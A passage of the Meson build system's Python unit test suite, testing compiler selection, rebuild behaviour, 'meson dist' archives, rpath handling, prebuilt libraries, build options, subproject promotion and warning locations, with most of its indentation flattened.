commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
            env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <[email protected]>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
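        # Create a small throwaway project, initialise it with the given VCS,
        # run `meson dist`, and check that the default .tar.xz archive plus
        # checksum is produced while a .zip archive only appears when requested
        # via --formats.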
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
        Test that built targets use $ORIGIN in rpath, which ensures that they
        are relocatable and that builds are reproducible, since the build
        directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
                self.assertIsNone(rpath)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
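        # Detect the host C compiler and static linker, and pick the object
        # and shared library suffixes used on this platform for the prebuilt
        # artifact tests below.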
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
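        # Compile a single source file to an object file, using msvc-style
        # arguments (/Fo, /c) or gcc-style arguments (-c, -o) depending on the
        # argument syntax reported by the compiler.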
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
        # Build the archive command from the detected static linker object so
        # that both ar-style and msvc lib.exe-style archivers are handled the
        # same way.
        link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
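        # Link a shared library directly with the compiler driver: msvc-style
        # toolchains get /DLL plus an import library, other toolchains get
        # -shared (adding -fPIC where needed and a -soname outside of macOS).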
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
        Test that we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build.
        Also test that it's not a hard error to have unsatisfiable library deps,
        since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
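        # 's3' can be promoted by its bare name, whereas promoting 'scommon' by
        # bare name is rejected and the full subprojects/s2/... path has to be
        # used instead.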
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
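        # Re-run the configuration from several working directories and check
        # that the file paths in the warnings are printed relative to the
        # invocation directory.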
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
            elif lang in ('java',):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
        Test that using link_with: with a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
